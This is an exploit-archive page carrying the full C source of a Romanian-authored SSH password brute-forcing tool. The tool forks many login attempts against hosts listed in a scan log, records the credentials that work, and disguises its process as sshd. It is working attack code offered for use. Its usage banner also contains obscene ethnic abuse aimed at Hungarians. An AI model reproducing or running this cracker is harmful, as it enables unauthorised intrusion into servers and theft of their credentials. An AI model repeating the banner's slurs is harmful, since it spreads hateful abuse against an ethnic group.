exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

FULG SSH Cracking Utility

FULG SSH Cracking Utility
Posted Oct 29, 2009
Authored by fulg

FULG SSH cracking utility.

tags | cracker
SHA-256 | 43ec4b963e9750762aa06b6d1903f3f72afdf9ed91044a51a0e5b7f95760a744

FULG SSH Cracking Utility

Change Mirror Download
/*
* by FULG of #texter :)
* greetings to most famous Romanian h4x0rs :
* lover4you, ps, LordNikon, iptables, sonkeriki, starters, zorg, pentaguard
* rou:
* Ca sa il compilati trebuie sa aveti instalat
* http://packetstormsecurity.org/crypt/LIBS/ssh/libssh-0.1.tgz ;
* Dupa ce instalezi libssh cp /usr/local/lib/libssh.so /usr/lib/
* gcc -o brutessh fulg.c -I /usr/local/include -L /usr/local/lib/ -lssh -lpthread
*
* Mai multe bunatati pe www.fulg.home.ro !
* Editeaza pass.txt in felul urmator :
* user pass
* user2 pass2
* user3 pass3
*
* Ce face brutessh-ul nostru :
* - isi ascunde procesul in ps
* - poti sa il modifici sa iti execute comenzi pe serverul gasit :)
* - nu mai da erori segmault default , gata !
* - are culori frumoase si un mesaj si mai frumos pt unguri
*
* eng:
* some code ripped from zorg's brutessh.c
* -- this was private for 3 years!
* edit the pass.txt in the next format :
* user1 pass1
* user2 pass2
* user3 pass3
* Cheers.
* - it fakes the proccesss name in ps list
* - it gets users/password from a list
* - some bugfixes
* - optimized
* TODO:
* - fix some bugs
* - make it to execute commands on the host it hacks.
*
*/
#include <stdio.h>
#include <arpa/inet.h>
#include <libssh/libssh.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#define ALB "\033[1;37m"
#define ALB2 "\033[5;37m"
#define NORM "\033[00;00m"
#define BOLD "\033[00;01m"
#define ROSU "\033[01;31m"
#define GALBEN "\033[01;33m"
#define VERDE "\033[01;32m"
#define ALBASTRU "\033[01;34m"
#define FAKE "/usr/sbin/sshd" // cum vrei sa apara in ps ? :D

int flag,where;
int shell(SSH_SESSION *session){
struct timeval;
int err;
BUFFER *readbuf=buffer_new();
time_t start;
CHANNEL *channel;
channel = open_session_channel(session,1000,1000);
if(isatty(0)) // verificam daca avem tty
err=channel_request_pty(channel); // cerem un pty
err= channel_request_shell(channel); // cerem shell
start=time(0); // start teh timer
while (channel->open!=0) // channel open ..
{
usleep(500000); // sleep
err=channel_poll(channel,0);
if(err>0){ // do we have a shell ?
err=channel_read(channel,readbuf,0,0); //read teh buffer in the channel
}
else
{
if(start+5<time(0))
{
return 1;
}
}
}
return 0;
}
/* here comes the nice part
* This function checks auth
*/

void checkauth(char *user,char *password,char *host) {
struct hostent *hp;struct in_addr *myaddr;
SSH_SESSION *session; // declare some session thingies
SSH_OPTIONS *options;
int argc=1;
char *argv[]={"none"};
FILE *vulnf,*nolog; // file where we log the shizz
where++;
alarm(10);
options=ssh_getopt(&argc,argv);
options_set_username(options,user);
options_set_host(options,host);
session=ssh_connect(options);
if(!session) return ;
if(ssh_userauth_password(session,NULL,password) != AUTH_SUCCESS) // if no shell, disconnect.
{
ssh_disconnect(session);
return;
}
if(shell(session)) // if we got a session, then we printf() it and log it =>
{
if(!flag){
myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
myaddr->s_addr=inet_addr(host);
hp = gethostbyaddr((char *) myaddr,4,AF_INET);
if((hp!=NULL)){
vulnf=fopen("vuln.txt","a+");
fprintf(vulnf,"%s:%s %s | %sn",user,password,host,hp->h_name);
printf("n-> %s:%s %s | %sn",user,password,host,hp->h_name);}
else{
vulnf=fopen("vuln.txt","a+");
fprintf(vulnf,"%s:%s %s | host did not resolven",user,password,host);
printf("n-> %s:%s %s | host did not resolven",user,password,host);
}
// flag=1;
fclose(vulnf);
}
}
else{ // if ssh login is denied, printf() && log it
myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
myaddr->s_addr=inet_addr(host);
hp = gethostbyaddr((char *) myaddr,4,AF_INET);
nolog=fopen("nobash.txt","a+");
if((hp!=NULL)){
fprintf(nolog,"%s %s %s | %sn",user,password,host,hp->h_name);
printf("nnobash -> %s %s %s | %sn",user,password,host,hp->h_name);}
else
{
fprintf(nolog,"%s %s %s | no hostn",user,password,host);
printf("nnobash -> %s %s %s | no hostn",user,password,host);}

fclose(nolog);
}
}
int main(int argc, char **argv)
{
FILE *fp,*passf;
char *c;
char buff[4096];
char *a[80196], nutt[4096], *temp, *t, *string;
malloc(sizeof(a));
malloc(sizeof(nutt));
int count = 0, i;
int numforks,maxf;
if((passf=fopen("pass.txt","r")) == NULL)
{ // here we scan the pass file for users and passwords.
printf("FATAL: Cant find pass.txtn");
return -1;
}
while (fgets(nutt,2024,passf))
{
while (t = strchr (nutt,'n'))
*t = '.';
temp = strtok (nutt, " ");
string = strdup (temp);
a[count++]=string;
while (temp = strtok (NULL, " "))
{
string = strdup (temp);
a[count++]=string;
}

}
fclose(passf);

if(argc!=2)
{
printf(ROSU"@lizard !\n");
printf(ALB"--> SSHD Bruteforce by FULG of #texter research group!\n");
printf(ALB"--> gretings : zorg, sonkeriki, lordnikon, lover4you, starters, zorg, iptables s.a.m.d\n");
printf("\n");
printf(GALBEN" .-. \n");
printf(GALBEN" |-| \n");
printf(GALBEN" | | <- Mesaj pt bozgori: \n");
printf(GALBEN" _.-|=|-. <- Cu multa dragoste si stima \n");
printf(GALBEN" / | | | | <- Va uram un calduros SA VA FUTEM IN GURA\n");
printf(GALBEN" | |\ <- Vreti autonomie ? SUGETI PULA ! \n");
printf(GALBEN" | / <- Vreti ungaria ? EMIGRATI ! \n");

printf("\n");
printf(NORM"%s <max forks>\n",argv[0]);
printf("\n");

exit(0);
}
if((fp=fopen("scan.log","r"))==NULL) exit(printf("FATAL: Cannot open scan.logn"));

maxf=atoi(argv[1]);

strcpy(argv[0],FAKE); // fake the proccess name.
while(fgets(buff,sizeof(buff),fp))
{
c=strchr(buff,'n');
if(c!=NULL) *c='.';
if (!(fork()))
{
where=0;
// printf("--> attacking %s",buff);
for (i=0; i<count; i=i+2){
// printf("--> Trying %s:%s %sn",a[i],a[i+1],buff);
checkauth(a[i],a[i+1],buff); // try to auth
}
exit(0);
}
else
{
numforks++;
if (numforks > maxf)
for (numforks; numforks > maxf; numforks--)
wait(NULL);
}
}
}
Login or Register to add favorites

File Archive:

December 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    0 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    32 Files
  • 5
    Dec 5th
    10 Files
  • 6
    Dec 6th
    13 Files
  • 7
    Dec 7th
    23 Files
  • 8
    Dec 8th
    19 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close